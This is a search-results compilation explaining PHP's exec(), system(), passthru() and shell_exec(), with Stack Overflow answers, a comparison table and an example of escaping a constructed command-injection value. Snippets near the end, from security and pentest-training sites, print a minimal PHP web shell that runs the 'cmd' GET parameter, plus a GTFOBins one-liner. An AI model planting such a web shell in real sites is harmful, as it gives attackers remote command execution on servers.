They have slightly different purposes.

  • exec() is for calling a system command, and perhaps dealing with the output yourself.
  • system() is for executing a system command and immediately displaying the output - presumably text.
  • passthru() is for executing a system command which you wish the raw return from - presumably something binary.

Regardless, I suggest you not use any of them. They all produce highly unportable code.

Answer from Kalium on Stack Overflow
PHP
php.net › manual › en › function.system.php
PHP: system - Manual
For example: system("timeconfig > /dev/tty < /dev/tty"); System will wait for the program to finish before continuing. ... another reason to use shell_exec instead of system is when the result is multiple lines such as grep or ls

<?php
// this correctly sets answer string to all lines found
//$answer = shell_exec ("grep 'set of color names' *.php ");
//echo "answer = $answer";

// this passes all lines to output (they show on page)
// and sets answer string to the final line
$sys = system ("grep 'set of color names' *.php ");
echo "sys =(($sys))";
?>

here is view/source resulting from system ca
2 of 5
173

The previous answers seem all to be a little confusing or incomplete, so here is a table of the differences...

+----------------+-----------------+----------------+----------------+
|    Command     | Displays Output | Can Get Output | Gets Exit Code |
+----------------+-----------------+----------------+----------------+
| system()       | Yes (as text)   | Last line only | Yes            |
| passthru()     | Yes (raw)       | No             | Yes            |
| exec()         | No              | Yes (array)    | Yes            |
| shell_exec()   | No              | Yes (string)   | No             |
| backticks (``) | No              | Yes (string)   | No             |
+----------------+-----------------+----------------+----------------+
  • "Displays Output" means it streams the output to the browser (or command line output if running from a command line).
  • "Can Get Output" means you can get the output of the command and assign it to a PHP variable.
  • The "exit code" is a special value returned by the command (also called the "return status"). Zero usually means it was successful, other values are usually error codes.

Other misc things to be aware of:

  • The shell_exec() and the backticks operator do the same thing.
  • There are also proc_open() and popen() which allow you to interactively read/write streams with an executing command.
  • Add "2>&1" to the command string if you also want to capture/display error messages.
  • Use escapeshellcmd() to escape command arguments that may contain problem characters.
  • If passing an $output variable to exec() to store the output, if $output isn't empty, it will append the new output to it. So you may need to unset($output) first.
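
The behaviours in the table and notes above, shown side by side as an added PHP example that is not part of either answer. It assumes a POSIX shell with ls and printf; the file name is a constructed value, and the example quotes it with escapeshellarg(), PHP's function for quoting a single argument.

```php
<?php
// Added example, not code from the answers. Assumes a POSIX shell with ls and printf.

// Constructed untrusted value: a file name carrying shell metacharacters.
$name = 'report.txt; echo INJECTED';

// escapeshellarg() single-quotes the value so the shell treats it as one argument;
// "--" stops ls from reading it as an option; 2>&1 folds stderr into the captured output.
$cmd = 'ls -- ' . escapeshellarg($name) . ' 2>&1';

// exec(): displays nothing, fills $lines (one element per line), sets $code.
$lines = [];
exec($cmd, $lines, $code);
echo "exec: exit=$code, lines=" . count($lines) . "\n";
echo 'injected command ran: ' . (in_array('INJECTED', $lines, true) ? 'yes' : 'no') . "\n";

// exec() appends to a non-empty array, so reusing $lines without resetting it
// mixes output from two commands.
$before = count($lines);
exec('printf "a\nb\n"', $lines, $code);
echo "exec reuse: $before old + 2 new = " . count($lines) . " lines\n";

// shell_exec(): whole output as one string, no exit code.
$all = shell_exec('printf "a\nb\n"');
echo 'shell_exec: ' . json_encode($all) . "\n";

// system(): streams the output as it runs, returns only the last line, sets $code.
$last = system('printf "a\nb\n"', $code);
echo 'system: last line=' . json_encode($last) . ", exit=$code\n";

// passthru(): streams raw bytes, returns nothing useful, sets $code.
passthru('printf "a\nb\n"', $code);
echo "passthru: exit=$code\n";
```
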
Discussions

PHP system() function - does it use shell to execute command? - Stack Overflow
I read a related post and I get the impression that the system() function in php does not use a shell. But then saw the following example posted on owasp - example 6 on the page: The following PHP... More on stackoverflow.com
stackoverflow.com
Executing unix shell commands using PHP - Stack Overflow
Oh, and running arbitrary commands from your users is perhaps one of the greatest security risks that you could ever conceive of, but I kind of assume you know this by now. ... But like sdleihssirhc mentioned, watch out, this IS very dangerous and you should NOT allow everything to be executed! If you still want to do it, to get the output of the shell, just use · exec The output of the shell will be passed in the second parameter. ... See http://php.net/system ... More on stackoverflow.com
stackoverflow.com
Using PHP to execute cmd commands - Stack Overflow
How do I properly execute commands ... using php? For example I'm using the command below in the command line to convert a docx file into a pdf file: ... ### Update Do you get any errors in your logs? What happens if you wrap that shell_exec call in a var_export? ### Original Have you tried system() ... More on stackoverflow.com
stackoverflow.com
Spawning a separate process for a long task
I've been using it for a couple of years with a default PHP & Apache2 config. Haven't had any problems. ... shell_exec is a very dangerous command and in general not the way things should be done. More on reddit.com
r/PHP
39
17
September 21, 2012
People also ask

What is a web shell?
A web shell is a small application that an attacker runs on your web server. They can then use this application to remotely access your server and run commands on it. A web shell by itself is never an attack, it is the aftermath of a successful attack on your website or web application. This means that if you have a web shell, you have a much more serious problem to worry about. See how a web shell works in practice.
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
How do malicious hackers use web shells?
Malicious hackers use web shells to take control of an already compromised server. First, they exploit a vulnerability in your website or web application such as SQL injection, remote code execution, or others. Then, they upload a web shell to your web server. From now on, they can run any commands that they like on your server. See a step-by-step example of an attack that leads to full server compromise.
How can I detect web shells?
You can detect web shells by log analysis. However, you should not focus on detecting web shells but instead, you should detect vulnerabilities that can let attackers take control of your server. Even if you detect a web shell, that will not stop attackers from taking over control again if the vulnerabilities are still there. To detect web vulnerabilities and learn how to eliminate them, use Acunetix. See what Acunetix Premium can do for you.
Acunetix
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
March 5, 2025 - Surprisingly, not many PHP developers are aware of this, but PHP will execute the contents of backticks (`) as a shell command. Note: The backtick character (`) should not be confused with the single quote character (‘)

<?php
$output = `whoami`;
echo "<pre>$output</pre>";
?>
--> www-data

Based on the above, the following is a PHP web shell in its simplest form. ... It uses the system() function to execute commands that are being passed through the ‘cmd’ HTTP request GET parameter.
GitHub
github.com › mikehaertl › php-shellcommand
GitHub - mikehaertl/php-shellcommand: A simple object oriented interface to execute shell commands in PHP · GitHub
<?php
use mikehaertl\shellcommand\Command;

// Basic example
$command = new Command('/usr/local/bin/mycommand -a -b');
if ($command->execute()) {
    echo $command->getOutput();
} else {
    echo $command->getError();
    $exitCode = $command->getExitCode();
}
Starred by 324 users
Forked by 55 users
Languages   PHP
Tutorialspoint
tutorialspoint.com › php › php_system_calls.htm
PHP System Calls
PATH=C:\Python311\Scripts\;C:\Python311\;C:\WINDOWS\system32;C:\WINDOWS; C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\; C:\WINDOWS\System32\OpenSSH\;C:\xampp\php;C:\Users\mlath\AppData\Local \Microsoft\WindowsApps;C:\VSCode\Microsoft VS Code\bin · PHP supports one execution operator: backticks (``). (they are not single-quotes!) PHP will attempt to execute the contents of the backticks as a shell command; the output will be returned.
BCCNsoft
doc.bccnsoft.com › docs › php-docs-7-en › function.system.html
Execute an external program and display the output
<?php
echo '<pre>';

// Outputs all the result of shellcommand "ls", and returns
// the last output line into $last_line. Stores the return value
// of the shell command in $retval.
$last_line = system('ls', $retval);

// Printing additional info
echo '
</pre>
<hr />Last line of the output: ' .
Anto
anto.online › home › code › how to execute shell commands via php
How to execute shell commands via PHP - Anto ./online
June 17, 2022 - The PHP functions to execute shell command are: shell_exec(), exec() or system(). These functions are remarkably similar but have slight differences.
GitBooks
sushant747.gitbooks.io › total-oscp-guide › content › webshell.html
Webshell · Total OSCP Guide - sushant747
shell.php?cmd=whoami
<?php system($_GET['cmd']); ?>

# The same but using passthru
<?php passthru($_GET['cmd']); ?>

# For shell_exec to output the result you need to echo it
<?php echo shell_exec("whoami");?>

# Exec() does not output the result without echo, and only outputs the last line.
Gtfobins
gtfobins.org › gtfobins › php
php | GTFOBins
php -r 'echo shell_exec("/path/to/command");' Sudo
Linux Hint
linuxhint.com › execute_shell_command_php
Execute Shell Command in PHP using exec() – Linux Hint
How this function can be used in PHP is shown in this tutorial. string exec ( string $command [, array &$output [, int &$return_var ]] ) This function can take three arguments. The first argument is mandatory and takes the system command. The other two arguments are optional.
GeeksforGeeks
geeksforgeeks.org › php › php-shell_exec-vs-exec-function
PHP shell_exec() vs exec() Function - GeeksforGeeks
July 11, 2025 - While shell_exec() returns the ... more control over output handling. The shell_exec() function in PHP executes a command via the shell and returns the complete output as a string....
GitHub
gist.github.com › joswr1ght › 22f40787de19d80d110b37fb79ac3985
easy-simple-php-webshell.php · GitHub
Just started ethical hacking and need to exploit a site vulnerability, upload a shell with file upload and download permissions and get a webshell for my project. And I am stuck here.
Piotr Horzycki
peterdev.pl › execute-a-shell-command-in-php
Executing shell commands from a PHP script | Piotr Horzycki - Java and PHP developer’s blog
April 2, 2021 - The PHP documentation recommends it when binary output has to be sent without interference. shell_exec() executes a command and returns the complete output as a string. It does not provide the exit code. The function return value is confusing because it can be null both if an error occurred and if the command produced no output. system() acts like passthru(), but it also returns the last line of the output.